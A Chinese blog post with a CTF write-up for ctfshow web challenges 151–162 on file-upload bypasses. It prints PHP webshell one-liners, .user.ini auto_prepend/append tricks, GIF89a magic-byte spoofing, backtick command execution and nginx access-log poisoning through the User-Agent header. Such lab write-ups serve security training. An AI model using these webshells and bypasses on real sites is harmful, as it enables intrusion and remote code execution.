<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.0.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/hudielan.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/fhudielan.png">
  <link rel="mask-icon" href="/images/hudielan.png" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":"valine","storage":true,"lazyload":false,"nav":null,"activeClass":"valine"},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"manual","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>





<script>
    (function(){
        if(''){
            if (prompt('请输入密码') !== ''){
                alert('密码错误');
                history.back();
            }
        }
    })();
</script>
  <meta name="description" content="web文件上传">
<meta property="og:type" content="article">
<meta property="og:title" content="ctfshow中web151">
<meta property="og:url" content="http://example.com/2022/03/05/ctfshow%E4%B8%ADweb151/index.html">
<meta property="og:site_name" content="影影之家">
<meta property="og:description" content="web文件上传">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/b14a685c3d0fb3d5b05e456d5d5173c4.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/628eebd9ba602d43a74570d985fa756e.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/005b52d76974ce1a6dda39de589be8a4.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/dbf75ba7fdd7f50dfbb11071e7bf8622.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/22f894b628fb986ade70a130429055ef.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/c61e86a98b2bd81e1943d10a226c3110.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/3b0a093264463fc2334873f026b9092b.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/71a0d72b8452748fe3f7a1033a704df2.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/5e2864d90e332a1ada5d494a797659da.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/2376e2992308c9ef3b0a25edf5fde1ac.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/ddc55bf5742c1f5c3d675562a72dfa06.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/162b2d0bd52fcadc1eeb0e234080d7ef.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/f4e02b5c285a7f14a9c7f41c7d5a87e2.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/f5831dd499ea89788d6190979dc017b4.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/b96dae8583e75832a9314b04d2db9c72.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/cdf4bc4d0176fdc980a0fc8e9861d6f2.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/e0451d6d8ed5a0496f99413027184f49.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/bb0087072363df3d3be65b712f9e8901.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/cee46380bd2705be429067eb7d9652d9.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/d2714303aa74fa9ee6f3f814c6102aa3.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/ba7eaffe92415f3a507c2da90c3b8d15.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/94a5426c1aa408ab36bd039099b95985.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/d2e161450af8240f8fedb842b167786b.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/img_convert/c7fbb73b8bba8bf2af2611485e797344.png">
<meta property="article:published_time" content="2022-03-05T03:27:45.000Z">
<meta property="article:modified_time" content="2022-07-08T08:39:47.210Z">
<meta property="article:author" content="余归">
<meta property="article:tag" content="wp">
<meta property="article:tag" content="CTF">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://img-blog.csdnimg.cn/img_convert/b14a685c3d0fb3d5b05e456d5d5173c4.png">

<link rel="canonical" href="http://example.com/2022/03/05/ctfshow%E4%B8%ADweb151/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>ctfshow中web151 | 影影之家</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">影影之家</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-links">

    <a href="/links/" rel="section"><i class="fa fa-link fa-fw"></i>友链</a>

  </li>
        <li class="menu-item menu-item-love">

    <a href="/Love/" rel="section"><i class="fa fa-heartbeat fa-fw"></i>Love</a>

  </li>
        <li class="menu-item menu-item-guestbook">

    <a href="/guestbook/" rel="section"><i class="fa fa-book fa-fw"></i>留言板</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2022/03/05/ctfshow%E4%B8%ADweb151/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.png">
      <meta itemprop="name" content="余归">
      <meta itemprop="description" content="Believe not all that you see nor half what you hear.">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="影影之家">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          ctfshow中web151
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2022-03-05 11:27:45" itemprop="dateCreated datePublished" datetime="2022-03-05T11:27:45+08:00">2022-03-05</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2022-07-08 16:39:47" itemprop="dateModified" datetime="2022-07-08T16:39:47+08:00">2022-07-08</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/wp/" itemprop="url" rel="index"><span itemprop="name">wp</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF/" itemprop="url" rel="index"><span itemprop="name">CTF</span></a>
                </span>
            </span>

          
            <span id="/2022/03/05/ctfshow%E4%B8%ADweb151/" class="post-meta-item leancloud_visitors" data-flag-title="ctfshow中web151" title="阅读次数">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span class="leancloud-visitors-count"></span>
            </span>
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="far fa-comment"></i>
      </span>
      <span class="post-meta-item-text">Valine：</span>
    
    <a title="valine" href="/2022/03/05/ctfshow%E4%B8%ADweb151/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2022/03/05/ctfshow%E4%B8%ADweb151/" itemprop="commentCount"></span>
    </a>
  </span>
  
  

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>web文件上传</p>
<span id="more"></span>

<h1 id="151题"><a href="#151题" class="headerlink" title="151题"></a>151题</h1><p>1.看到题目直接上传图片码</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/b14a685c3d0fb3d5b05e456d5d5173c4.png" alt="image-20220305113122536"></p>
<p>抓包后修改数据（把png格式改为php）</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/628eebd9ba602d43a74570d985fa756e.png" alt="image-20220305113500127"></p>
<p>然后蚁剑连接<img src="https://img-blog.csdnimg.cn/img_convert/005b52d76974ce1a6dda39de589be8a4.png" alt="image-20220305113359904"></p>
<p>最后找到flag</p>
<p>2.可以在一句话木马的后缀改为.png</p>
<p>抓包之后再改回php</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/dbf75ba7fdd7f50dfbb11071e7bf8622.png" alt="image-20220305114519356"></p>
<p>最后用蚁剑连接</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/22f894b628fb986ade70a130429055ef.png" alt="image-20220305114532190"></p>
<h1 id="152题"><a href="#152题" class="headerlink" title="152题"></a>152题</h1><p>与151题的两种方法一样</p>
<h1 id="153题"><a href="#153题" class="headerlink" title="153题"></a>153题</h1><p>这一题很容易上传php5及其他类型的文件，但是都不被解析</p>
<p>尝试上传.user.ini(因为题目要求的是图片形式的，所以必须先改成png或jpg格式）发现上传成功</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/c61e86a98b2bd81e1943d10a226c3110.png" alt="image-20220305115929994"></p>
<p>然后再上传图片码</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/3b0a093264463fc2334873f026b9092b.png" alt="image-20220305120153519"></p>
<p>然后访问/upload/index.php,发现上传的木马已经被解析掉了</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/71a0d72b8452748fe3f7a1033a704df2.png" alt="image-20220305120251113"></p>
<p>接着用蚁剑连接，获得flag</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/5e2864d90e332a1ada5d494a797659da.png" alt="image-20220305120401500"></p>
<h1 id="154题"><a href="#154题" class="headerlink" title="154题"></a>154题</h1><p>前面的解题方法跟153题一样，上传图片码之后把php进行大小写绕过</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/2376e2992308c9ef3b0a25edf5fde1ac.png" alt="image-20220310195907614"></p>
<p>接着查看/upload/index.php看看上传的一句话是不是已经被解析掉了<img src="https://img-blog.csdnimg.cn/img_convert/ddc55bf5742c1f5c3d675562a72dfa06.png" alt="image-20220310200008244"></p>
<p>然后再连接一下蚁剑就行</p>
<h1 id="155题"><a href="#155题" class="headerlink" title="155题"></a>155题</h1><p>前面的步骤还是先上传.user.ini文件，然后再上传图片码，试了好几种绕过类型都不行，最后直接把php给删掉了，没想到直接看到了路径，所以这一题是限制了木马文件，直接使用短标签进行绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?= eval($_POST[shell]);?&gt;</span><br></pre></td></tr></table></figure>

<p><img src="https://img-blog.csdnimg.cn/img_convert/162b2d0bd52fcadc1eeb0e234080d7ef.png" alt="image-20220310201041687"></p>
<p>在/upload/index.php下能够被解析</p>
<p>接着用蚁剑连接，得到wp<img src="https://img-blog.csdnimg.cn/img_convert/f4e02b5c285a7f14a9c7f41c7d5a87e2.png" alt="image-20220310201331540"></p>
<h1 id="156题"><a href="#156题" class="headerlink" title="156题"></a>156题</h1><p>前面的步骤跟上题基本一致</p>
<p>经测试过滤了[],可以用{}或者()来代替[]</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/f5831dd499ea89788d6190979dc017b4.png" alt="image-20220310201845621"></p>
<p>接着查看在/upload/index.php下是否被解析，然后蚁剑连接即可得到flag</p>
<h1 id="157题"><a href="#157题" class="headerlink" title="157题"></a>157题</h1><p>先成功上传.user.ini</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">auto_append_file=1.shell.png</span><br></pre></td></tr></table></figure>

<p>再上传1.shell.png，对比上题，发现过滤了;和{}，所以可以用闭合php标签中的?&gt;来绕过，接着上传一下shell.png</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?system(&#x27;tac ../f*&#x27;)?&gt;</span><br></pre></td></tr></table></figure>

<p>成功之后直接查看/uoload即可看到flag</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/b96dae8583e75832a9314b04d2db9c72.png" alt="image-20220310210256573"></p>
<h1 id="158题"><a href="#158题" class="headerlink" title="158题"></a>158题</h1><p>方法和步骤跟上一题一样</p>
<h1 id="159题"><a href="#159题" class="headerlink" title="159题"></a>159题</h1><p>先上传.user.ini文件，然后再抓包，发现这题中连()都过滤了，所以这里就需要用到短标签，内容如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?=`tac ../f*`?&gt;</span><br></pre></td></tr></table></figure>

<p>php会将’‘中的内容当作代码来执行，下面的步骤跟上面的都一样</p>
<h1 id="160题"><a href="#160题" class="headerlink" title="160题"></a>160题</h1><p>先上传.user.ini</p>
<p>再上传2.shell.png,内容为<code>&lt;?=include&quot;/var/lo&quot;.&quot;g/nginx/access.lo&quot;.&quot;g&quot;?&gt;</code>（log被过滤）</p>
<p>再修改user-agent<code>&lt;?php eval($_POST[shell]);?&gt;</code></p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/cdf4bc4d0176fdc980a0fc8e9861d6f2.png" alt="image-20220311213338925"></p>
<p>在/upload/index.php下查看上传的一句话木马是否被解析掉</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/e0451d6d8ed5a0496f99413027184f49.png" alt="image-20220311213445852"></p>
<p>接下来蚁剑连接就行</p>
<p>如果这里直接包含flag的话会出现报错<img src="https://img-blog.csdnimg.cn/img_convert/bb0087072363df3d3be65b712f9e8901.png" alt="image-20220311213632882"></p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/cee46380bd2705be429067eb7d9652d9.png" alt="image-20220311213705836"></p>
<p>因为include_path的限制</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/d2714303aa74fa9ee6f3f814c6102aa3.png" alt="image-20220311213821175"></p>
<p>前面的题目可以nl ../*是因为像system()；等函数不收include_path或者open_basedir的限制，还有include()不支持正则表达式</p>
<h1 id="161题"><a href="#161题" class="headerlink" title="161题"></a>161题</h1><p>上传.user.ini.png发现失败了，但是文件又需要上传图片格式本，所以本题需要加一个幻术文件头</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">GIF89a</span><br><span class="line">auto_prepend_file=shell.png</span><br></pre></td></tr></table></figure>

<p>上传文件抓包</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/ba7eaffe92415f3a507c2da90c3b8d15.png" alt="image-20220312093607884"></p>
<p>再上传2.shell.png，内容为</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">GIF89a</span><br><span class="line">&lt;?=include&quot;/var/lo&quot;.&quot;g/nginx/access.lo&quot;.&quot;g&quot;?&gt;</span><br></pre></td></tr></table></figure>

<p>再修改user-agent</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php eval($_POST[shell]);?&gt;</span><br></pre></td></tr></table></figure>

<p><img src="https://img-blog.csdnimg.cn/img_convert/94a5426c1aa408ab36bd039099b95985.png" alt="image-20220312095050364"></p>
<p>查看在/upload/index.php下是否被解析</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/d2e161450af8240f8fedb842b167786b.png" alt="image-20220312095446213"></p>
<p>接着用蚁剑连接得到flag</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/c7fbb73b8bba8bf2af2611485e797344.png" alt="image-20220312095614625"></p>
<h1 id="162题"><a href="#162题" class="headerlink" title="162题"></a>162题</h1>
    </div>

    
    
    
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>余归
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="http://example.com/2022/03/05/ctfshow%E4%B8%ADweb151/" title="ctfshow中web151">http://example.com/2022/03/05/ctfshow中web151/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>


      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/wp/" rel="tag"># wp</a>
              <a href="/tags/CTF/" rel="tag"># CTF</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/03/02/ctfshow%E4%B8%ADweb1-web17/" rel="prev" title="ctfshow中web1~web20">
      <i class="fa fa-chevron-left"></i> ctfshow中web1~web20
    </a></div>
      <div class="post-nav-item">
    <a href="/2022/03/07/ctfhub%E6%8A%80%E8%83%BD%E4%B9%A6web%E5%88%B7%E9%A2%98/" rel="next" title="ctfhub技能树web刷题">
      ctfhub技能树web刷题 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="valine-comments"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#151%E9%A2%98"><span class="nav-number">1.</span> <span class="nav-text">151题</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#152%E9%A2%98"><span class="nav-number">2.</span> <span class="nav-text">152题</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#153%E9%A2%98"><span class="nav-number">3.</span> <span class="nav-text">153题</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#154%E9%A2%98"><span class="nav-number">4.</span> <span class="nav-text">154题</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#155%E9%A2%98"><span class="nav-number">5.</span> <span class="nav-text">155题</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#156%E9%A2%98"><span class="nav-number">6.</span> <span class="nav-text">156题</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#157%E9%A2%98"><span class="nav-number">7.</span> <span class="nav-text">157题</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#158%E9%A2%98"><span class="nav-number">8.</span> <span class="nav-text">158题</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#159%E9%A2%98"><span class="nav-number">9.</span> <span class="nav-text">159题</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#160%E9%A2%98"><span class="nav-number">10.</span> <span class="nav-text">160题</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#161%E9%A2%98"><span class="nav-number">11.</span> <span class="nav-text">161题</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#162%E9%A2%98"><span class="nav-number">12.</span> <span class="nav-text">162题</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="余归"
      src="/images/avatar.png">
  <p class="site-author-name" itemprop="name">余归</p>
  <div class="site-description" itemprop="description">Believe not all that you see nor half what you hear.</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">37</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">9</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">10</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>




      
<script type="text/javascript" charset="utf-8" src="/js/tagcloud.js"></script>
<script type="text/javascript" charset="utf-8" src="/js/tagcanvas.js"></script>
<div class="widget-wrap">
    <h3 class="widget-title">标签云</h3>
    <div id="myCanvasContainer" class="widget tagcloud">
        <canvas width="250" height="250" id="resCanvas" style="width=100%">
            <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/wp-CTF/" rel="tag">-wp -CTF</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/CTF/" rel="tag">CTF</a><span class="tag-list-count">34</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/ctf/" rel="tag">ctf</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/misc/" rel="tag">misc</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/php%E4%BC%AA%E5%8D%8F%E8%AE%AE/" rel="tag">php伪协议</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/tips/" rel="tag">tips</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/web/" rel="tag">web</a><span class="tag-list-count">6</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/wp/" rel="tag">wp</a><span class="tag-list-count">25</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%BF%83%E5%BE%97/" rel="tag">心得</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E9%80%86%E5%90%91/" rel="tag">逆向</a><span class="tag-list-count">1</span></li></ul>
        </canvas>
    </div>
</div>



    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        
  <div class="beian"><a href="https://beian.miit.gov.cn/" rel="noopener" target="_blank">豫ICP备2022025057号-1 </a>
      <img src="/images/beian.png" style="display: inline-block;"><a href="http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=%E8%B1%AB%E5%85%AC%E7%BD%91%E5%AE%89%E5%A4%87%2041142602000196%E5%8F%B7" rel="noopener" target="_blank">豫公网安备 41142602000196号 </a>
  </div>

<div class="copyright">
  
  &copy; Sun Dec 26 2021 08:00:00 GMT+0800 (中国标准时间) – 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">余归</span>
</div>
  <div class="powered-by">
<span id="timeDate">载入天数...</span><span id="times">载入时分秒...</span>
<script>
    var now = new Date(); 
    function createtime() { 
        var grt= new Date("12/25/2021 17:38:00");
        now.setTime(now.getTime()+250); 
        days = (now - grt ) / 1000 / 60 / 60 / 24; dnum = Math.floor(days); 
        hours = (now - grt ) / 1000 / 60 / 60 - (24 * dnum); hnum = Math.floor(hours); 
        if(String(hnum).length ==1 ){hnum = "0" + hnum;} minutes = (now - grt ) / 1000 /60 - (24 * 60 * dnum) - (60 * hnum); 
        mnum = Math.floor(minutes); if(String(mnum).length ==1 ){mnum = "0" + mnum;} 
        seconds = (now - grt ) / 1000 - (24 * 60 * 60 * dnum) - (60 * 60 * hnum) - (60 * mnum); 
        snum = Math.round(seconds); if(String(snum).length ==1 ){snum = "0" + snum;} 
        document.getElementById("timeDate").innerHTML = "影影已在此快乐的玩耍了 "+dnum+" 天 "; 
        document.getElementById("times").innerHTML = hnum + " 小时 " + mnum + " 分 " + snum + " 秒"; 
    } 
setInterval("createtime()",250);
</script>
<br />








<div class="theme-info">
  <div class="powered-by"></div>
  <span class="post-count">影影的家共种了48.9k朵花</span>
</div>

<br />


    <script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    已经有<span id="busuanzi_value_site_pv"></span>人摘了影影种的花</span>
    <span class="post-meta-divider"> </span>
    其中<span id="busuanzi_value_site_uv"></span>人不留痕迹地跑了</span>
    <span class="post-meta-divider"> </span>





<a target="_blank" rel="noopener" href="https://www.upyun.com/?utm_source=lianmeng&amp;utm_medium=referra"><img src="https://z4a.net/images/2022/05/31/image649ac1128183cf97.png"align="absmiddle" width="59px" height="30px" /></a>
        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  
  <script color='0,0,255' opacity='0.5' zIndex='-1' count='99' src="/lib/canvas-nest/canvas-nest.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


